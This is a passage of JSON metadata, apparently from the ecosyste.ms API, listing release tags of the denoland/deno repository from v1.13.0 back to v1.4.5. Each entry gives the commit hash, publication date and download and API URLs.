1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/den